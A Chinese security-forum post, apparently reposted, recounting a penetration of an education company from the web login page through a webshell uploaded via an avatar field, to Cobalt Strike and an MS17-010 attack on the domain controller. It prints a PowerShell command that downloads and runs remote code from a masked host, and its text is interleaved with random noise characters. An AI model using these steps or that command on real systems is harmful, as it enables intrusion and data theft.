|
' d) |0 v8 }4 ] 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路7 N/ S4 S6 ?2 B9 d' A. n
7 {- E* @" f" l1 p/ h# Q
, f, O* K& x% K1 Z; S3 R% j
$ t; a) O& M0 q
- S4 X) O3 M* c6 o" R, L
8 g6 m7 l. v* Y! c6 o& H$ R4 O: H 正文
" h" V0 C! K0 v
$ r+ O$ A1 k4 S& A; Q4 ]) V. W$ e' m
4 f3 ^* S7 M3 |8 E8 w/ F
; m( J# m! q6 T( U2 x8 S! ] V! u, l \8 g A, O- e5 f: Y
目标:www.xxxx.com(一家教育机构)
u, E/ `# g8 P) s0 R2 V
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能8 `. P) C2 V" W+ I) ~
) ?% t% @9 @2 S4 Q7 b8 n8 [
# K6 P% {; n- g4 x: G) k) o* O 
( s% z1 u6 K% O& A
9 l2 P8 B1 }; v/ D* s
% ]. b* ~- j) I! x7 g# f: z 进行了简单的信息搜集
G3 y1 @3 K% N* s
" Z9 ~0 ^& h' @% Q
% z* W, s2 l3 x- e- c
2 z5 J3 w. M8 {1 [2 K
/ @; t8 D/ D; }' l7 V
子域名搜集
3 u1 G5 T; C! Q) o! d) P; B! s+ L8 i
4 e) [7 z2 r' ~0 J' y3 V* e& b6 l
 1 N6 b$ R; W0 \# _' S; h* R$ X
" v7 W0 B7 ] F4 s" K& L; t! Q3 X5 m( F9 a2 B5 \
fofa找资产
' h8 `0 ^2 O! K
" g1 U5 F8 b2 `. ^
& ]( e( u0 t1 L& \/ c& m ' W* X; v) u* _/ ~
5 M* u( S. F4 \. d+ k8 F
 ( B$ C; O6 ?% J- f2 w
" C( d6 H5 c7 A% n" G
+ L# v# H, P9 V 一共七个资产。去重之后只有两个。
$ F) y; W6 K4 g# C. `! P
. {6 r u0 _" q: n5 N/ U
/ z$ R0 Y. K, r9 B1 B % d _# z/ I- l6 @! `2 E
7 z- m8 d8 A( _. E
目录探测3 r3 v; B; z. E" `# |0 ^
+ V/ ^6 ^6 d3 |0 ]- k/ K- R
$ s' H1 D5 l% _5 l2 ]- [ 
) F! r h4 x6 K0 w. Y% D0 V! T ' T9 m6 t9 l* r" D1 P$ V! L
9 j4 M& ~4 q3 j0 q
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* l, r9 n1 k) ~* ^$ l5 ~5 }
5 @5 w( f& V) ?3 u( m; Q
4 i; r/ \/ `. n- X ( p' \5 j; i: H5 m- G
5 A) D! [4 \7 \# J0 g 我又尝试了通过修改返回包来绕过登录界面
% w+ o& F! w( }3 s. C
1 I1 M j- L6 Q& [6 N! T# x/ d
# f0 M* @, t; @$ b  ; a. Z2 y) t1 }( B5 v+ D
2 n; g1 K+ D+ G3 L5 y. m' w7 C
& C: u& U d9 V! S- o
还是不行,尝试注入无果$ L, J% A. b+ r+ ~% `4 B
, w; n$ O9 x" Y% ~$ t g* @, i# b3 ^* K0 u# ^% e+ _
, N% \# Z y+ ? 0 r7 Y) L5 U. \
' q f3 P" I+ a% }- H
不过我目录探测出了一处Spring信息泄露
6 P1 o" X! {" h
" y9 l" O& ]' a/ X9 J
5 w3 b( d. A4 x1 Z
' G* r8 Y" G: P% E8 H9 P- E% t& H; d) ?
4 e: V1 O/ E3 T/ N% Y& l
2 M, a$ A6 x/ d1 _) J( m+ [9 f7 I4 Z. V9 a4 J$ ^
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
9 e- D; d6 ^: w O5 Y+ h
, \- G6 F% {+ _/ T2 Z; A
, m$ D" R: m& X% F 
% m8 f1 L0 t; e W. O
/ H) S) j P5 i, I' L+ L. m7 o `. @
2 m" Y2 r" z. ]8 d 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 A5 G' t% x, U8 s/ q' o3 d+ u
: q8 k! P2 D' m4 P* C& r' s2 B+ r: B
6 t5 l3 X! J! } 0 Z' m- `; h2 m2 m) J3 S1 w
2 [/ v( Q; V1 i" N8 A2 K9 R6 T 获取有些师傅到这一步就手机抓包电脑测了。& c9 F# H8 r, A& H
" f; q: m ]: g: C2 F- _# c5 k# V0 a9 O' {2 y
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。* S$ @0 ` D# n; r4 j
- p8 U8 H T. |
W e. Q9 y$ q( t( U 其中在一个公众号发现了小程序,可以进行注册。
5 @& |9 V: o. @
" B5 S! y4 F8 h0 f. w0 A, p: l( \- I' [6 Z+ D0 N1 F2 W
看到了头像上传,尝试上传获取WebShell9 Q) h6 D5 v, Q: ~2 Y O8 p- c
! E. l) j/ B* Y! W' m$ B
, S/ T( _, X" C9 h# B  % W% Q+ D2 s1 _2 C2 a
4 }) Q" u+ V4 n- A/ _
1 u$ S$ U& C j* j9 l$ t& F
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问( ?* r/ \, C* ]8 l) S: D
+ c2 u' k0 z9 D, v* F' H
`! Q: c7 E: Y1 [: A) B  4 O& E( z1 ]! t& N. L3 D r
- m( o' B+ Q* M! ^3 y% `. c
! @" Y5 C, @2 D3 A$ I
然后上了大马% Z( \' f) Y9 w6 W/ v0 K4 q8 ^, `
9 W+ ~$ D6 W9 T* s9 Q
" ]$ y; k$ Y( v* N
$ V" P9 x% d* t( B, {7 p7 b% _
1 j b' Z1 e2 W8 q- d5 O8 k% `! }+ i5 }
" }6 r3 q( l' S& t
4 }/ x! [3 Y \% `( ?" u1 J; _
T& d" J+ V; W9 U/ ?# u 通过翻找文件发现数据库账号密码
3 m& m6 I* }2 u7 e% [5 f8 G
* M# w. p5 c8 @
7 L4 H0 E: W+ K 
6 n& D2 P4 ?6 T2 S / S7 {6 s4 R' _# p+ B
) A$ C* N9 P6 F9 s; h3 @
--内网渗透8 E" E/ f$ D. L
) y1 c. Y: J* {: M- w u6 t# a7 i9 A- f
+ d% k- E K0 l0 v 直接通过powershell执行 cs上线
; J$ u) c$ U9 ]7 L. g
4 u1 K! o: ^- t5 G6 S; q, w' d5 c+ @) C9 r7 i8 C5 {( @- ~# d$ g: I
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 `5 B9 s$ T( ~1 r% J
) B$ y' }+ O1 e9 A% H& X, j* Q
5 |8 B8 G8 X1 p# n! P
 % K) S/ Y/ G4 ^ a; X* i( C# b
B t( @: r' e" F2 v) f$ k
6 W- C3 J- H+ E) R
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) e& \. f9 Z L. M9 G
( r! C9 [' s1 |: q9 S. ^
, W, q7 S" w8 C; H* ~7 m 
g- }/ @" B$ v/ J4 g' H4 z 5 H/ d9 Q8 L, j% e
4 y; {1 K; ^% K% D- _* \- F! d
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, l4 J; Y% Z# K( r! l4 L2 b8 l0 Y' i
+ Q( _9 X+ x1 C1 s
P; o& Q9 @( i) a# ~& b# [9 U( |3 o! T0 x% Y% h. z. L
3 i# T) j& s3 {
! |1 Z' Y" J8 F# B: F: l2 x5 Z, y 
- ] @* p0 n7 X0 |
) g4 l" E$ t6 d1 Z) |5 ]
0 `2 [- ^( I" ]) i' d9 p$ ^) o$ ? 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
' G8 y6 k: G+ \+ C
, a$ Q( V K9 N, o
* Q, c7 m9 S- R5 e) ?9 T- X X
+ Q. i4 D& e1 F: g' p
* N9 N5 d1 Q, f  " _6 ^& ?+ O. Q8 @ j" P. ?6 |7 U
) C8 C, b& j4 j" c! v i
& B: Z& Z" y% v! M% S
) q# c! N. f* i5 E7 C+ D; \
2 e! @) P2 ~0 s* ^! e
3 e, n8 O) f* t( B. \7 f5 h
4 l+ k. g% E8 u! n
+ c) Z' s% o# t! q; [' \ 0 Z3 m8 X; H" b
4 ~" }" O8 w" N7 w' i6 O
- a- F. e8 y9 z3 L' ~ 小结
9 |: W5 P7 e2 @3 n" A+ W2 l
% V7 Q, E/ T u& ?5 a, B+ B( x
5 m2 t: M: L, l* ^6 C0 `- e $ d3 {6 |2 X/ e' q% A! D W
- O7 g' h# M; I3 Q
7 \- q3 B1 ^. o' e 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 C5 Q0 y1 f6 i& a0 U, R! L9 i
3 f) L, v- W9 G5 {* j
0 C' J9 z e J) F& [" q ! w7 v! s: r( L" `; y9 S
+ P+ |0 o, G) A
. B! } U" _$ U: o0 U' {2 g
-
( @! Z4 S4 Z: L z7 N
d- R. P) u# w0 [* o7 F
) |# J/ t" g4 d/ K6 R6 N; q/ `8 {
- % e G5 q3 z3 d3 c, |
5 H) }( j. ~/ H7 b
/ H3 z1 v, l5 H9 o( z
3 Q% }) t8 J6 i% Q! W& O: Z8 ^5 V4 m7 f7 L! D
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html$ }( \6 q5 R( K. K8 Y( j
+ q: r3 B) W3 v" r5 D9 {3 ?4 X) J1 n. h( N2 z1 ?
5 k6 I) F6 K# ^2 v: l5 Y$ D3 B9 h | 
发表于 2024-3-1 19:41:32
收藏
支持
反对